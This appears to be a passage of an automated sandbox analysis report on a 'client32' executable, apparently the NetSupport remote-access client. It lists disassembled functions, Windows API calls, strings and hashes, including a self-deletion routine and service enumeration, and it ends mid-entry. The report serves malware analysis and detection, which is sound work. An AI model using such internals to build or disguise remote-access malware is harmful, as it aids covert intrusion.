                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BC09B7644010C77DF111A83DC05E457F1D97C0674F144010FF1C1D1609573E971D685
                                                                                                                                                                                                    Function 00401000 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _NSMClient32@8.PCICL32(?,?,004010A8,00000000), ref: 0040100A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4094618180.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4094591498.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4094652158.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4094673945.0000000000404000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Client32@8
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 433899448-0
                                                                                                                                                                                                    • Opcode ID: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
                                                                                                                                                                                                    • Instruction ID: 101b8ead0f36abaf2e4a9e5d6dc85a2691bea7164fd7fac6f3abc260b8d29af7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85B012B91043406FC104DB10C880D2B73A8BBC4300F008D0DB4D142181C734D800C632
                                                                                                                                                                                                    Function 687E1E1C Relevance: 1.3, APIs: 1, Instructions: 32sleepCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 687E09A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,687E1E32,00000001,?,00000000,00000000,00000000,?,688075BC,00000001,00000214), ref: 687E09E8
                                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 6880F1D1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeapSleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4201116106-0
                                                                                                                                                                                                    • Opcode ID: b6b0c9f1491dee994ec473a50c7df72eefb8b705c33e06370d2d1d618162b90f
                                                                                                                                                                                                    • Instruction ID: 274beece8e3844bfc3e8e2f38e42855b16748084e614c2412fab217671f2a4c5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6b0c9f1491dee994ec473a50c7df72eefb8b705c33e06370d2d1d618162b90f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF0A035980114ABCB105B79DE19A8A3AA6ABC2773B900733F93CC21E0DA318501C2F2

                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                    Function 11123570 Relevance: 68.5, APIs: 31, Strings: 8, Instructions: 289fileprocessthreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT ref: 11123590
                                                                                                                                                                                                    • _memset.LIBCMT ref: 111235AD
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 111235C6
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 111235E5
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112362B
                                                                                                                                                                                                    • _strrchr.LIBCMT ref: 1112363A
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11123673
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,111B3308,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112369F
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 111236AC
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111236C7
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 111236D7
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 111236F1
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112371D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112372E
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11123737
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112373A
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 11123770
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11123812
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11123815
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11123818
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112382C
                                                                                                                                                                                                    • _strrchr.LIBCMT ref: 1112383B
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 111238B4
                                                                                                                                                                                                    • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111238D4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
                                                                                                                                                                                                    • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                                                                                                                                                    • API String ID: 2219718054-800295887
                                                                                                                                                                                                    • Opcode ID: 4cc1fde5e20de1d22eceee8bdc9d3861e2b7a2064f589f295b2194325481a8e0
                                                                                                                                                                                                    • Instruction ID: f5da5898e03af7335dd3b432591c065ee650f23ce63a0b1c8c4037c06c323e7f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cc1fde5e20de1d22eceee8bdc9d3861e2b7a2064f589f295b2194325481a8e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2B186B5A44329AFE720DF54CC85FDAF7B8EB48704F108199E619A72C0DB70AA44CF55
                                                                                                                                                                                                    Function 11127110 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 400COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00000000,00000000,?), ref: 1112714B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ManagerOpen
                                                                                                                                                                                                    • String ID: EnumServices returned %d$QueryServiceConfig2W$advapi32.dll
                                                                                                                                                                                                    • API String ID: 1889721586-3267302290
                                                                                                                                                                                                    • Opcode ID: 21b3c385728fcf88e82166965005ac8aff01d1b65566217e64c1eab89ee832e7
                                                                                                                                                                                                    • Instruction ID: 9fb7de677e030cfc0a01f6eedc798a2385bd80f55b8063cdc9a43f6634fa85b6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21b3c385728fcf88e82166965005ac8aff01d1b65566217e64c1eab89ee832e7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39E17575A006599FEB24CF24CD94FABF7B9AF84304F208699E91997240DF30AE85CF50
                                                                                                                                                                                                    Function 110251B0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 384windowtimeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenu.USER32(?), ref: 11025347
                                                                                                                                                                                                    • DrawMenuBar.USER32(?), ref: 1102535E
                                                                                                                                                                                                    • GetMenu.USER32(?), ref: 110253B3
                                                                                                                                                                                                    • DeleteMenu.USER32(00000000,00000001,00000400), ref: 110253C1
                                                                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1102531E
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 11025407
                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 1102541A
                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 1102543A
                                                                                                                                                                                                    • KillTimer.USER32(00000000,00000000,00000080,00000002), ref: 110254A0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$TimerWindow$DeleteDrawErrorExitIconicKillLastMessageProcessUpdatewsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\chatw.cpp$Chat$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 3085788722-363603473
                                                                                                                                                                                                    • Opcode ID: e69d78fb2f8639c597be4dd6d8a4cfc2e884be2be3f7c90e4c2329286fe3b857
                                                                                                                                                                                                    • Instruction ID: b6232a099581f0ae497a3b344fdba13ecce31f738ecb0fc666d570829b7bf44f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e69d78fb2f8639c597be4dd6d8a4cfc2e884be2be3f7c90e4c2329286fe3b857
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14D1AC74B40702ABEB14DB64CC85FAEB3A5BB88708F104558F6529F3C1DAB1F941CB95
                                                                                                                                                                                                    Function 1103B220 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 189COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _calloc.LIBCMT ref: 1103B306
                                                                                                                                                                                                    • _free.LIBCMT ref: 1103B400
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                      • Part of subcall function 110CCAD0: FindResourceExA.KERNEL32(00000000,00000005,?,00000000), ref: 110CCB55
                                                                                                                                                                                                      • Part of subcall function 110CCAD0: LoadResource.KERNEL32(00000000,00000000), ref: 110CCB84
                                                                                                                                                                                                      • Part of subcall function 110CCAD0: LockResource.KERNEL32(00000000), ref: 110CCBA8
                                                                                                                                                                                                      • Part of subcall function 110CCAD0: CreateDialogIndirectParamA.USER32(00000000,00000000,1112A889,110CAE00,00000000), ref: 110CCBD9
                                                                                                                                                                                                      • Part of subcall function 110CCAD0: CreateDialogIndirectParamA.USER32(00000000,00000000,1112A889,110CAE00,00000000), ref: 110CCBF4
                                                                                                                                                                                                      • Part of subcall function 110CCAD0: GetLastError.KERNEL32 ref: 110CCC19
                                                                                                                                                                                                    • _calloc.LIBCMT ref: 1103B415
                                                                                                                                                                                                    • _free.LIBCMT ref: 1103B450
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$CreateDialogIndirectParam_calloc_free$ErrorFindLastLoadLock_memsetwsprintf
                                                                                                                                                                                                    • String ID: $CLTCONN.CPP$DoUserLogin$Get login name. Check if logged in$GetName$Login name %s$Not logged in!$u
                                                                                                                                                                                                    • API String ID: 3626227667-1552251038
                                                                                                                                                                                                    • Opcode ID: 01fd35b3c109e338554ba1db0897715522d16d727ac1624b289d742af69260c7
                                                                                                                                                                                                    • Instruction ID: 25b904e35b270628fa9a38861c68e686706e0c30f1396ea4e15f3982f5bea4d1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01fd35b3c109e338554ba1db0897715522d16d727ac1624b289d742af69260c7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97612674E41A1AEFD710DFA4CCC1FADF3A5AB8470DF104269EA265B2C0EB716940C792
                                                                                                                                                                                                    Function 687E888A Relevance: 18.2, APIs: 12, Instructions: 160stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000002,?,?,00000000), ref: 687E862D
                                                                                                                                                                                                    • free.MSVCR100(?,?,?,00000000), ref: 687E864E
                                                                                                                                                                                                    • _calloc_crt.MSVCR100(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 687E884F
                                                                                                                                                                                                    • strncpy_s.MSVCR100(00000000,00000000,00000000,-00000001), ref: 687E8869
                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 687E88D4
                                                                                                                                                                                                    • _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 687E88E3
                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 687E88FC
                                                                                                                                                                                                    • free.MSVCR100(00000000), ref: 688106D9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoLocale$_calloc_crtfree$strncpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2432546303-0
                                                                                                                                                                                                    • Opcode ID: bd0965a4c78a354b3d7a51f7eba73c108848ed11855bb36697273ebdc04c0b86
                                                                                                                                                                                                    • Instruction ID: fd7c63a1a2577cc275688471a1b27ca759b541783fe213353fde4b45cc84d38f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd0965a4c78a354b3d7a51f7eba73c108848ed11855bb36697273ebdc04c0b86
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F51DD7194421AEFEF108F248E4DBAE3BA9BF02314F904465F828E2151EF319960CF70
                                                                                                                                                                                                    Function 1115B180 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 440COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 1115B1C6
                                                                                                                                                                                                    • RemovePropA.USER32(?), ref: 1115B1E5
                                                                                                                                                                                                    • RemovePropA.USER32(?), ref: 1115B1F4
                                                                                                                                                                                                    • RemovePropA.USER32(?,00000000), ref: 1115B203
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • CallWindowProcA.USER32(?,?,?,?,?), ref: 1115B55A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\wndclass.cpp$old_wndproc
                                                                                                                                                                                                    • API String ID: 1777853711-3305400014
                                                                                                                                                                                                    • Opcode ID: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
